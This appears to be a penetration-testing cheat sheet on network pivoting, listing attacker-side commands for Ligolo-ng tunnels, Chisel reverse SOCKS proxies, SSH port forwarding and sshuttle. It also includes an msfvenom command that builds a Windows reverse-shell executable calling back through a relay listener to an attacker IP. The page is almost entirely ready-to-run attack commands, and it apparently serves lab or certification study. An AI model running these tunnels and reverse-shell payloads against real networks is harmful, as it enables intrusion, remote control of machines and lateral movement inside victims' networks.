🔀Pivoting
Refer this for more techniques
Use my script from script Proxify.sh from here
Ligolo-ng
Attacker:
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.201.0/24 dev ligolo
sudo ligolo-proxy -selfcertAdd the targets ip range as seen in ifconfig in ligolo

172.16.201.0/24Target:
./agent -connect 192.168.45.244:11601 -ignore-cert -retryTo redirect:
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:4444Creates a listener on the machine where we're running the agent at port 1234
and redirects the traffic to port 4444 on our machine.
You can use other ports, of course.
Reverse shell:
Example for the listener above:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=1234 -f exe -o reverse.exeFor file transfer:
Create another listener
listener_add --addr 0.0.0.0:1235 --to 0.0.0.0:8000Now transfer files by using the ip of the machine that was tunneled from earlier and use port 1234. Create a python server on port 8000 in kali.
Chisel
Attacker:
chisel server --reverse --socks5 -p 8001Target:
./chisel client <attacker ip>:8001 R:socks Then add to /etc/proxychains5.conf
To forward a single port from target to our machine:
./chisel client 192.168.45.244:8001 R:8000:127.0.0.1:8000SSH Port Forwarding
Multiple ports can be forwarded
ssh -L <localhost ip>:localhost:<remote ip> ubuntu@10.129.202.64Can be scanned like so :
nmap -v -sV -p1234 localhostSSH pivoting
sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v Sshuttle
sshuttle -r root@10.200.98.200 --ssh-cmd "ssh -i key.rsa" 10.200.98.0/24 -x 10.200.98.200 &Last updated
Was this helpful?